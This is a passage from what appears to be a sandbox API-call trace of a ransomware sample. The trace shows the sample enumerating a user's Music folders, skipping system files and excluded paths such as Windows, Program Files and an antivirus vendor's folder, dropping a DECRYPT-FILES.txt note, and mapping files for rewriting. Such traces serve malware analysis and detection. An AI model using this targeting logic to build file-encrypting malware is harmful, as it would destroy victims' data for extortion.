ftLastAccessTime.dwLowDateTime=0x96e9c720, ftLastAccessTime.dwHighDateTime=0x1d4ceb6, ftLastWriteTime.dwLowDateTime=0xaf30bee0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x8f31, dwReserved0=0x0, dwReserved1=0x0, cFileName="TabxmQAtp.mp3.tpQ2HiC", cAlternateFileName="TABXMQ~1.TPQ")) returned 1 [0185.878] lstrcmpiW (lpString1="TabxmQAtp.mp3.tpQ2HiC", lpString2="DECRYPT-FILES.txt") returned 1 [0185.878] lstrcmpiW (lpString1="TabxmQAtp.mp3.tpQ2HiC", lpString2="autorun.inf") returned 1 [0185.879] lstrcmpiW (lpString1="TabxmQAtp.mp3.tpQ2HiC", lpString2="boot.ini") returned 1 [0185.879] lstrcmpiW (lpString1="TabxmQAtp.mp3.tpQ2HiC", lpString2="desktop.ini") returned 1 [0185.879] lstrcmpiW (lpString1="TabxmQAtp.mp3.tpQ2HiC", lpString2="ntuser.dat") returned 1 [0185.879] lstrcmpiW (lpString1="TabxmQAtp.mp3.tpQ2HiC", lpString2="iconcache.db") returned 1 [0185.879] lstrcmpiW (lpString1="TabxmQAtp.mp3.tpQ2HiC", lpString2="bootsect.bak") returned 1 [0185.879] lstrcmpiW (lpString1="TabxmQAtp.mp3.tpQ2HiC", lpString2="ntuser.dat.log") returned 1 [0185.879] lstrcmpiW (lpString1="TabxmQAtp.mp3.tpQ2HiC", lpString2="thumbs.db") returned -1 [0185.879] lstrcmpiW (lpString1="TabxmQAtp.mp3.tpQ2HiC", lpString2="Bootfont.bin") returned 1 [0185.879] lstrlenW (lpString="TabxmQAtp.mp3.tpQ2HiC") returned 21 [0185.879] lstrcmpiW (lpString1="tpQ2HiC", lpString2="lnk") returned 1 [0185.879] lstrcmpiW (lpString1="tpQ2HiC", lpString2="exe") returned 1 [0185.879] lstrcmpiW (lpString1="tpQ2HiC", lpString2="sys") returned 1 [0185.879] lstrcmpiW (lpString1="tpQ2HiC", lpString2="dll") returned 1 [0185.879] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\") returned 67 [0185.879] lstrlenW (lpString="TabxmQAtp.mp3.tpQ2HiC") returned 21 [0185.879] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\" [0185.879] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\", lpString2="TabxmQAtp.mp3.tpQ2HiC" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\TabxmQAtp.mp3.tpQ2HiC") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\TabxmQAtp.mp3.tpQ2HiC" [0185.879] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.879] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\zmVkZ0mtR2bYJ\\TabxmQAtp.mp3.tpQ2HiC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\zmvkz0mtr2byj\\tabxmqatp.mp3.tpq2hic"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x26c [0185.880] GetFileSizeEx (in: hFile=0x26c, lpFileSize=0x36fdfa8 | out: lpFileSize=0x36fdfa8*=36657) returned 1 [0185.880] CreateFileMappingW (hFile=0x26c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0185.880] MapViewOfFile (hFileMappingObject=0x270, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.880] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.880] CloseHandle (hObject=0x270) returned 1 [0185.881] CloseHandle (hObject=0x26c) returned 1 [0185.881] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.881] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7d68370, ftCreationTime.dwHighDateTime=0x1d4c75c, ftLastAccessTime.dwLowDateTime=0x96e9c720, ftLastAccessTime.dwHighDateTime=0x1d4ceb6, ftLastWriteTime.dwLowDateTime=0xaf30bee0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x8f31, dwReserved0=0x0, dwReserved1=0x0, cFileName="TabxmQAtp.mp3.tpQ2HiC", cAlternateFileName="TABXMQ~1.TPQ")) returned 0 [0185.881] FindClose (in: hFindFile=0x4798f8 | out: hFindFile=0x4798f8) returned 1 [0185.881] CloseHandle (hObject=0x264) returned 1 [0185.881] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc0447120, ftCreationTime.dwHighDateTime=0x1d4d2ed, ftLastAccessTime.dwLowDateTime=0xaf332040, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf332040, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zmVkZ0mtR2bYJ\\", cAlternateFileName="ZMVKZ0~1")) returned 0 [0185.881] FindClose (in: hFindFile=0x4798b8 | out: hFindFile=0x4798b8) returned 1 [0185.881] CloseHandle (hObject=0x25c) returned 1 [0185.881] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c0c4a70, ftCreationTime.dwHighDateTime=0x1d4c636, ftLastAccessTime.dwLowDateTime=0x732b2930, ftLastAccessTime.dwHighDateTime=0x1d4c6ac, ftLastWriteTime.dwLowDateTime=0xaf3581a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x10a54, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qMEzdi4bO.wav.iEZ0", cAlternateFileName="QMEZDI~1.IEZ")) returned 1 [0185.881] lstrcmpiW (lpString1="qMEzdi4bO.wav.iEZ0", lpString2="DECRYPT-FILES.txt") returned 1 [0185.881] lstrcmpiW (lpString1="qMEzdi4bO.wav.iEZ0", lpString2="autorun.inf") returned 1 [0185.881] lstrcmpiW (lpString1="qMEzdi4bO.wav.iEZ0", lpString2="boot.ini") returned 1 [0185.881] lstrcmpiW (lpString1="qMEzdi4bO.wav.iEZ0", lpString2="desktop.ini") returned 1 [0185.881] lstrcmpiW (lpString1="qMEzdi4bO.wav.iEZ0", lpString2="ntuser.dat") returned 1 [0185.881] lstrcmpiW (lpString1="qMEzdi4bO.wav.iEZ0", lpString2="iconcache.db") returned 1 [0185.881] lstrcmpiW (lpString1="qMEzdi4bO.wav.iEZ0", lpString2="bootsect.bak") returned 1 [0185.881] lstrcmpiW (lpString1="qMEzdi4bO.wav.iEZ0", lpString2="ntuser.dat.log") returned 1 [0185.882] lstrcmpiW (lpString1="qMEzdi4bO.wav.iEZ0", lpString2="thumbs.db") returned -1 [0185.882] lstrcmpiW (lpString1="qMEzdi4bO.wav.iEZ0", lpString2="Bootfont.bin") returned 1 [0185.882] lstrlenW (lpString="qMEzdi4bO.wav.iEZ0") returned 18 [0185.882] lstrcmpiW (lpString1="iEZ0", lpString2="lnk") returned -1 [0185.882] lstrcmpiW (lpString1="iEZ0", lpString2="exe") returned 1 [0185.882] lstrcmpiW (lpString1="iEZ0", lpString2="sys") returned -1 [0185.882] lstrcmpiW (lpString1="iEZ0", lpString2="dll") returned 1 [0185.882] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 36 [0185.882] lstrlenW (lpString="qMEzdi4bO.wav.iEZ0") returned 18 [0185.882] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0185.882] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="qMEzdi4bO.wav.iEZ0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\qMEzdi4bO.wav.iEZ0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\qMEzdi4bO.wav.iEZ0" [0185.882] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.882] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\qMEzdi4bO.wav.iEZ0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\qmezdi4bo.wav.iez0"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0185.882] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=68180) returned 1 [0185.883] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0185.883] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.883] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.883] CloseHandle (hObject=0x260) returned 1 [0185.883] CloseHandle (hObject=0x25c) returned 1 [0185.883] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.884] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb4bb4040, ftCreationTime.dwHighDateTime=0x1d4cc44, ftLastAccessTime.dwLowDateTime=0xaf43c9e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf43c9e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RAZ7", cAlternateFileName="")) returned 1 [0185.884] lstrcmpW (lpString1="RAZ7", lpString2=".") returned 1 [0185.884] lstrcmpW (lpString1="RAZ7", lpString2="..") returned 1 [0185.884] lstrcatW (in: lpString1="RAZ7", lpString2="\\" | out: lpString1="RAZ7\\") returned="RAZ7\\" [0185.884] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="RAZ7\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\" [0185.884] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\", lpSrch="\\Program Files") returned 0x0 [0185.884] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\", lpSrch=":\\Windows") returned 0x0 [0185.884] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\", lpSrch="\\Games\\") returned 0x0 [0185.884] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\", lpSrch="\\Tor Browser\\") returned 0x0 [0185.884] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\", lpSrch="\\ProgramData\\") returned 0x0 [0185.884] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0185.884] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0185.884] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0185.884] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\", lpSrch="\\All Users") returned 0x0 [0185.884] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\", lpSrch="\\IETldCache\\") returned 0x0 [0185.884] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\", lpSrch="\\Local Settings\\") returned 0x0 [0185.884] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\", lpSrch="\\AppData\\Local") returned 0x0 [0185.884] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\", lpSrch="AhnLab") returned 0x0 [0185.884] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0185.884] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\") returned 41 [0185.884] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.884] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\\\0a16c9.tmp") returned 52 [0185.884] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\raz7\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x25c [0185.889] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\") returned 41 [0185.889] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0185.889] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\\\DECRYPT-FILES.txt") returned 59 [0185.889] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\raz7\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.889] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\") returned 41 [0185.889] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\*" [0185.889] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\*", lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb4bb4040, ftCreationTime.dwHighDateTime=0x1d4cc44, ftLastAccessTime.dwLowDateTime=0xf1814ee0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1814ee0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798b8 [0185.889] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0185.889] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb4bb4040, ftCreationTime.dwHighDateTime=0x1d4cc44, ftLastAccessTime.dwLowDateTime=0xf1814ee0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1814ee0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.890] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0185.890] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0185.890] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1814ee0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf1814ee0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1814ee0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0185.890] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0185.890] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0185.890] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0185.890] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0185.890] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0185.890] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0185.890] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0185.890] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0185.890] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0185.890] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0185.890] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.890] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0185.890] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0185.890] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0185.890] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0185.890] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\") returned 41 [0185.890] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.890] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\" [0185.890] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\0a16c9.tmp" [0185.890] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.890] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\raz7\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.890] CloseHandle (hObject=0x0) returned 0 [0185.891] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.891] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf37e300, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaf37e300, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf37e300, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0185.891] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0185.891] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd36aebd0, ftCreationTime.dwHighDateTime=0x1d4cded, ftLastAccessTime.dwLowDateTime=0x6fa0b0b0, ftLastAccessTime.dwHighDateTime=0x1d4d493, ftLastWriteTime.dwLowDateTime=0xaf37e300, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xb7a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="eT6JvIsf5PzgpcQ4Oo.mp3.8zN27", cAlternateFileName="ET6JVI~1.8ZN")) returned 1 [0185.891] lstrcmpiW (lpString1="eT6JvIsf5PzgpcQ4Oo.mp3.8zN27", lpString2="DECRYPT-FILES.txt") returned 1 [0185.891] lstrcmpiW (lpString1="eT6JvIsf5PzgpcQ4Oo.mp3.8zN27", lpString2="autorun.inf") returned 1 [0185.891] lstrcmpiW (lpString1="eT6JvIsf5PzgpcQ4Oo.mp3.8zN27", lpString2="boot.ini") returned 1 [0185.891] lstrcmpiW (lpString1="eT6JvIsf5PzgpcQ4Oo.mp3.8zN27", lpString2="desktop.ini") returned 1 [0185.891] lstrcmpiW (lpString1="eT6JvIsf5PzgpcQ4Oo.mp3.8zN27", lpString2="ntuser.dat") returned -1 [0185.891] lstrcmpiW (lpString1="eT6JvIsf5PzgpcQ4Oo.mp3.8zN27", lpString2="iconcache.db") returned -1 [0185.891] lstrcmpiW (lpString1="eT6JvIsf5PzgpcQ4Oo.mp3.8zN27", lpString2="bootsect.bak") returned 1 [0185.891] lstrcmpiW (lpString1="eT6JvIsf5PzgpcQ4Oo.mp3.8zN27", lpString2="ntuser.dat.log") returned -1 [0185.891] lstrcmpiW (lpString1="eT6JvIsf5PzgpcQ4Oo.mp3.8zN27", lpString2="thumbs.db") returned -1 [0185.891] lstrcmpiW (lpString1="eT6JvIsf5PzgpcQ4Oo.mp3.8zN27", lpString2="Bootfont.bin") returned 1 [0185.891] lstrlenW (lpString="eT6JvIsf5PzgpcQ4Oo.mp3.8zN27") returned 28 [0185.891] lstrcmpiW (lpString1="8zN27", lpString2="lnk") returned -1 [0185.891] lstrcmpiW (lpString1="8zN27", lpString2="exe") returned -1 [0185.891] lstrcmpiW (lpString1="8zN27", lpString2="sys") returned -1 [0185.891] lstrcmpiW (lpString1="8zN27", lpString2="dll") returned -1 [0185.891] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\") returned 41 [0185.891] lstrlenW (lpString="eT6JvIsf5PzgpcQ4Oo.mp3.8zN27") returned 28 [0185.891] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\" [0185.891] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\", lpString2="eT6JvIsf5PzgpcQ4Oo.mp3.8zN27" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\eT6JvIsf5PzgpcQ4Oo.mp3.8zN27") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\eT6JvIsf5PzgpcQ4Oo.mp3.8zN27" [0185.891] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.891] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\eT6JvIsf5PzgpcQ4Oo.mp3.8zN27" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\raz7\\et6jvisf5pzgpcq4oo.mp3.8zn27"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.892] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=47010) returned 1 [0185.892] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.892] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.893] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.893] CloseHandle (hObject=0x268) returned 1 [0185.893] CloseHandle (hObject=0x264) returned 1 [0185.893] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.893] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1983890, ftCreationTime.dwHighDateTime=0x1d4d522, ftLastAccessTime.dwLowDateTime=0xd0992ba0, ftLastAccessTime.dwHighDateTime=0x1d4cd94, ftLastWriteTime.dwLowDateTime=0xaf3ca5c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x842e, dwReserved0=0x0, dwReserved1=0x0, cFileName="F_CLZ29qIc0hWf92.wav.1hdvP", cAlternateFileName="F_CLZ2~1.1HD")) returned 1 [0185.893] lstrcmpiW (lpString1="F_CLZ29qIc0hWf92.wav.1hdvP", lpString2="DECRYPT-FILES.txt") returned 1 [0185.893] lstrcmpiW (lpString1="F_CLZ29qIc0hWf92.wav.1hdvP", lpString2="autorun.inf") returned 1 [0185.893] lstrcmpiW (lpString1="F_CLZ29qIc0hWf92.wav.1hdvP", lpString2="boot.ini") returned 1 [0185.893] lstrcmpiW (lpString1="F_CLZ29qIc0hWf92.wav.1hdvP", lpString2="desktop.ini") returned 1 [0185.893] lstrcmpiW (lpString1="F_CLZ29qIc0hWf92.wav.1hdvP", lpString2="ntuser.dat") returned -1 [0185.893] lstrcmpiW (lpString1="F_CLZ29qIc0hWf92.wav.1hdvP", lpString2="iconcache.db") returned -1 [0185.893] lstrcmpiW (lpString1="F_CLZ29qIc0hWf92.wav.1hdvP", lpString2="bootsect.bak") returned 1 [0185.893] lstrcmpiW (lpString1="F_CLZ29qIc0hWf92.wav.1hdvP", lpString2="ntuser.dat.log") returned -1 [0185.893] lstrcmpiW (lpString1="F_CLZ29qIc0hWf92.wav.1hdvP", lpString2="thumbs.db") returned -1 [0185.893] lstrcmpiW (lpString1="F_CLZ29qIc0hWf92.wav.1hdvP", lpString2="Bootfont.bin") returned 1 [0185.893] lstrlenW (lpString="F_CLZ29qIc0hWf92.wav.1hdvP") returned 26 [0185.893] lstrcmpiW (lpString1="1hdvP", lpString2="lnk") returned -1 [0185.893] lstrcmpiW (lpString1="1hdvP", lpString2="exe") returned -1 [0185.893] lstrcmpiW (lpString1="1hdvP", lpString2="sys") returned -1 [0185.893] lstrcmpiW (lpString1="1hdvP", lpString2="dll") returned -1 [0185.894] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\") returned 41 [0185.894] lstrlenW 